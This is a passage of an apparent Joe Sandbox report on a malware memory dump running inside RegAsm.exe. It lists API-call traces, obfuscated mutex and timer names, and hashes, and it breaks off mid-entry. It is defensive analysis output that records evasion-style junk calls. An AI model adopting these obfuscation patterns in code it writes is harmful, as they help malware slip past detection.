fte7n198, xrefs: 0040E2BC
t87ox2vav, xrefs: 0040E2AC
regk8hftcvg, xrefs: 0040E1D9
WTMR_k80jkq3z, xrefs: 0040E1E5
MTX3t1mxx1o, xrefs: 0040E1A9
t0bddrwll, xrefs: 0040E27E
XMLzpeebx01, xrefs: 0040E22B
regupf760yl, xrefs: 0040E254

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$OpenSemaphore$EventRelease$DebugFileFindLocalMutexOutputStringTimerWaitable$AllocCancelCloseEnvironmentErrorFirstFreeLastMappingResetVariable
String ID: 87mu9ra2$MTX3t1mxx1o$SMPHR_g3v549yp$WTMR_k80jkq3z$XMLzpeebx01$ev_y69yttl7$fte7n198$regc448p6el$regk8hftcvg$regkst75e0p$regupf760yl$s_kkyiaenp$t0bddrwll$t87ox2vav
API String ID: 4072554257-944470601
Opcode ID: 12c53d688aaf42fd0fd5311077a8b7868668304a0fdd8d69c6117987e4c14de4
Instruction ID: 31ab2c6cb457673253e68f9e851217f11488f9677f230774811abe720d91c125
Opcode Fuzzy Hash: 12c53d688aaf42fd0fd5311077a8b7868668304a0fdd8d69c6117987e4c14de4
Instruction Fuzzy Hash: 7B317531A40354BFE7105BA1AD4AFEA7E7CEB48B55F104026B701F64E0D6B85AC0866D

Uniqueness

Uniqueness Score: -1.00%

Function 004087AA Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 319stringCOMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(00000000,00000000), ref: 004087D4

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 0040883E
lstrlenW.KERNEL32 ref: 00408930
lstrlenW.KERNEL32(004081BE), ref: 0040893B

Strings

., xrefs: 00408814

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$TimerWaitablelstrlen$Event$CancelDebugEnvironmentErrorLastLocalMutexOutputStringVariable$AllocChangeCloseCombineFileFindFreeMappingNotificationPathReleaseReset
String ID: .
API String ID: 3613403941-248832578
Opcode ID: 523f7679391a53f839d664211685854f8f32b422aad4b56a6bec27ef99c01cef
Instruction ID: 41ca6f609a914c53ae2253612664a49f2bd2a403a3a6681f5a81f17edcbbdd86
Opcode Fuzzy Hash: 523f7679391a53f839d664211685854f8f32b422aad4b56a6bec27ef99c01cef
Instruction Fuzzy Hash: 75C12B71E00605EFDB14DFA4DC85AEEBBB9FB88304F10807AE915A7391DB745D018BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407938 Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 381COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 004079CA

Strings

., xrefs: 004079EB

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: .
API String ID: 2826327444-248832578
Opcode ID: cad2df767164b109eef845fa56b94feca13c5757fb6133848e9270572fe27a2e
Instruction ID: 0029bd0a1f781fe70f2b59c559290c74618fbb772fa13653d1a9428aef19d341
Opcode Fuzzy Hash: cad2df767164b109eef845fa56b94feca13c5757fb6133848e9270572fe27a2e
Instruction Fuzzy Hash: D8E15B71A00605EFDB14DFA4DC85AEE7BB5BF88304F108139E915B7290DB78AD41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410952 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 00410AED
LocalFree.KERNEL32(00000000), ref: 00410BC4
LocalFree.KERNEL32(0041022B), ref: 00410BCE
LocalFree.KERNEL32(00000000), ref: 00410BD7
LocalFree.KERNEL32(00000000), ref: 00410BDE
LocalFree.KERNEL32(00000000), ref: 00410BE5
CloseHandle.KERNEL32(?), ref: 00410BEF
LocalFree.KERNEL32(00000000), ref: 00410C4A
LocalFree.KERNEL32(00000000), ref: 00410C51
LocalFree.KERNEL32(00000000), ref: 00410C5A
LocalFree.KERNEL32(00000000), ref: 00410C61
LocalFree.KERNEL32(00000000), ref: 00410C6A
LocalFree.KERNEL32(00000000), ref: 00410C71
LocalFree.KERNEL32(?), ref: 00410C9E
FindClose.KERNEL32(00000000), ref: 00410CA5

Part of subcall function 0040FB52: LocalAlloc.KERNEL32(00000040,00000000,?,?,00410A58), ref: 0040FB85
Part of subcall function 0040FB52: LocalFree.KERNEL32(XA,?,?,00410A58), ref: 0040FC06

Part of subcall function 00410952: LocalFree.KERNEL32(00000000), ref: 00410A3C

Strings

., xrefs: 004109C4

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Close$AllocFileFindHandleSize
String ID: .
API String ID: 4104688090-248832578
Opcode ID: 3065e09e8e32105278d41d530d765071574c0b036164d886f485e60f6a5daa90
Instruction ID: a79288c5b51e091fa953eff651415cbae652668d178c43eebeb88646b4cb418e
Opcode Fuzzy Hash: 3065e09e8e32105278d41d530d765071574c0b036164d886f485e60f6a5daa90
Instruction Fuzzy Hash: D1A16271A00605EFDB14DFA0DC89EEE7B75FB88304F108169F915A7291DB789D41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F00
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F1A
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F35

Strings

., xrefs: 0040403D

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: .
API String ID: 3494564517-248832578
Opcode ID: 4999ecacb4c974489106567a66737629d48337536d272110c72786fc4addb35a
Instruction ID: 0e215f248a8e1fcd69b20d46db8bab7dae96d6d05561c88b5daff5afe19be196
Opcode Fuzzy Hash: 4999ecacb4c974489106567a66737629d48337536d272110c72786fc4addb35a
Instruction Fuzzy Hash: D5913E75A00605EFDB059FE4DC49EEE7BB5FB8C300B008579EA15A72A0DB795D01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004041AD Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040420E
LocalAlloc.KERNEL32(00000040,00000000), ref: 00404228
LocalAlloc.KERNEL32(00000040,00000000), ref: 00404243

Strings

., xrefs: 0040434B

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: .
API String ID: 3494564517-248832578
Opcode ID: 413ddb8062b9793c438c632cd3c076b778aee2ea59dbbd3f8d533b3595edd282
Instruction ID: 8bf9c4909bdcfd2fc0daec3395b35b448d5b6f19392b116d9c0aad9bcf59667c
Opcode Fuzzy Hash: 413ddb8062b9793c438c632cd3c076b778aee2ea59dbbd3f8d533b3595edd282
Instruction Fuzzy Hash: D2913171A00605EFDB059FE4DC89EEE7BB5FB8C310B008579EA15A32A0DB755D11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05 Relevance: 25.9, APIs: 17, Instructions: 440stringCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 00402C94

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

StrCpyW.SHLWAPI(?,?), ref: 00402CD4
LocalFree.KERNEL32(00000000), ref: 00402CDF
LocalFree.KERNEL32(00000000), ref: 00402CEE
LocalFree.KERNEL32(00000000), ref: 00402CFD
LocalFree.KERNEL32(00000000), ref: 00402D0C
LocalFree.KERNEL32(00000000), ref: 00402D17
LocalFree.KERNEL32(?), ref: 00402E88
LocalFree.KERNEL32(00000000), ref: 00402EA0
wsprintfW.USER32 ref: 00403055
lstrlenW.KERNEL32(00000000), ref: 0040305F
wsprintfW.USER32 ref: 004030FA
lstrlenW.KERNEL32(00000000), ref: 00403104
LocalFree.KERNEL32(00000000), ref: 0040311F
LocalFree.KERNEL32(?), ref: 00403128
LocalFree.KERNEL32(00000000), ref: 00403136
LocalFree.KERNEL32(00000000), ref: 00403140

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariablelstrlenwsprintf$AllocCloseFileHandleMappingReset
String ID:
API String ID: 493543690-0
Opcode ID: 71800c06094f619900886bf881bf7ad0c352ff09261b54e6bcd0ca5c150ae1b5
Instruction ID: f5beb4675c52ca0de4374a6629b85e5d4c2131aa3c708fc54256f4d51f8f127f
Opcode Fuzzy Hash: 71800c06094f619900886bf881bf7ad0c352ff09261b54e6bcd0ca5c150ae1b5
Instruction Fuzzy Hash: F1021B71900609EFDB159FE0ED49AEEBFB6FB88300F108075E911B62A0DB755A50DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040318A Relevance: 25.4, APIs: 20, Instructions: 437COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 00403217

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(00000000), ref: 00403266
LocalFree.KERNEL32(00000000), ref: 00403275
LocalFree.KERNEL32(00000000), ref: 00403284
LocalFree.KERNEL32(00000000), ref: 0040328F
LocalFree.KERNEL32(00000000), ref: 0040329A
LocalFree.KERNEL32(00000000), ref: 004033C0
LocalFree.KERNEL32(?), ref: 004033C7
LocalFree.KERNEL32(00000000), ref: 004033F3
LocalFree.KERNEL32(?), ref: 004033FA
LocalFree.KERNEL32(00000000), ref: 0040369D
LocalFree.KERNEL32(?), ref: 004036AB

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseFileHandleMappingReset
String ID:
API String ID: 2315545926-0
Opcode ID: 2d89f2205c9a8f5980b95a65abb8596ca0ebad1483c47835f6c24c1deb1b434f
Instruction ID: 19265eb1ad024d6af1d01535d6ddcd3080084c10e456fc725a0d62a368887209
Opcode Fuzzy Hash: 2d89f2205c9a8f5980b95a65abb8596ca0ebad1483c47835f6c24c1deb1b434f
Instruction Fuzzy Hash: 6BF16131900615EFDB11DFA4EC44AEE7FBAFF89311F148066E911B72A0DB355A01CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402723 Relevance: 25.4, APIs: 20, Instructions: 410stringCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 004027B0

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(00000000), ref: 004027FF
LocalFree.KERNEL32(00000000), ref: 0040280E
LocalFree.KERNEL32(00000000), ref: 0040281D
LocalFree.KERNEL32(00000000), ref: 00402828
LocalFree.KERNEL32(00000000), ref: 00402833
LocalFree.KERNEL32(00000000), ref: 00402959
LocalFree.KERNEL32(?), ref: 00402960
LocalFree.KERNEL32(00000000), ref: 0040298C
LocalFree.KERNEL32(?), ref: 00402993
lstrlenW.KERNEL32(?), ref: 00402ACC
LocalFree.KERNEL32(00000000), ref: 00402BEC
LocalFree.KERNEL32(?), ref: 00402BFA

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseFileHandleMappingResetlstrlen
String ID:
API String ID: 2251351353-0
Opcode ID: 493871a065cb9960f89dc4199fbfd7366abe0ff34ffce7d39a25669426f42ab0
Instruction ID: 3891058dcb2b340212b430655327b39494642ecf0f9445dbcfcfb16ac14c3160
Opcode Fuzzy Hash: 493871a065cb9960f89dc4199fbfd7366abe0ff34ffce7d39a25669426f42ab0
Instruction Fuzzy Hash: DAE14D71900615EFDB11DFA4ED48AEE7BB6FF88310F148075E911B72A0DB785901CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 25.4, APIs: 20, Instructions: 407stringCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 00404548

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(00000000), ref: 00404597
LocalFree.KERNEL32(00000000), ref: 004045A6
LocalFree.KERNEL32(00000000), ref: 004045B5
LocalFree.KERNEL32(00000000), ref: 004045C0
LocalFree.KERNEL32(00000000), ref: 004045CB
LocalFree.KERNEL32(00000000), ref: 004046F1
LocalFree.KERNEL32(?), ref: 004046F8
LocalFree.KERNEL32(00000000), ref: 00404724
LocalFree.KERNEL32(?), ref: 0040472B
lstrlenW.KERNEL32(?), ref: 00404861
LocalFree.KERNEL32(00000000), ref: 0040497B
LocalFree.KERNEL32(?), ref: 00404989

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseFileHandleMappingResetlstrlen
String ID:
API String ID: 2251351353-0
Opcode ID: 2d2000d2bf8dad014b36e688d5f4ad12c06db926c32baa4b28493e882dbea95f
Instruction ID: b2c253b8d8952a74746669566927e24b8529b538fe979c93d24da04b41904070
Opcode Fuzzy Hash: 2d2000d2bf8dad014b36e688d5f4ad12c06db926c32baa4b28493e882dbea95f
Instruction Fuzzy Hash: FAE14F71900615EFDB11DFA4EC45AEE7BB6FF89310F148075EA11B72A0DB395A00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004105DE Relevance: 21.3, APIs: 14, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00410626
LocalFree.KERNEL32(00000000), ref: 00410681
LocalFree.KERNEL32(00000000), ref: 00410688

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID:
API String ID: 1941890384-0
Opcode ID: 8c7d74a788ac22cf32ccf0831d27e062d52161507989b26a8351dd0cccc5a216
Instruction ID: b3abc58fdfba2b09d71e20f02cc51ce9dd114d511d4b5e32247a5ddc5e2421dc
Opcode Fuzzy Hash: 8c7d74a788ac22cf32ccf0831d27e062d52161507989b26a8351dd0cccc5a216
Instruction Fuzzy Hash: 27A16071A00605EFDB15DBA4DC89FEE7BB5FF89310F008029F615A7290DBB49941CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004070C9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 00407124
LocalFree.KERNEL32(?), ref: 00407364
LocalFree.KERNEL32(?), ref: 0040738B
FindClose.KERNEL32(00000000), ref: 00407392

Strings

., xrefs: 0040713E

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: a68687249da22803c9ce3944d32513b0576702bee50af21143020d0b1123653b
Instruction ID: 5f164208ef0b6f0056d08abd7c16de3dc98ce71695939afe5029a15871e29c31
Opcode Fuzzy Hash: a68687249da22803c9ce3944d32513b0576702bee50af21143020d0b1123653b
Instruction Fuzzy Hash: A3815F71A00605EFDB14DFA4DC49EEE7BB5FB88310F108169FA15A7290D778A901CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA58 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 0040CAB1
LocalFree.KERNEL32(00000000), ref: 0040CCF0
LocalFree.KERNEL32(0040C929), ref: 0040CD17
FindClose.KERNEL32(00000000), ref: 0040CD1E

Strings

., xrefs: 0040CACB

Memory Dump Source

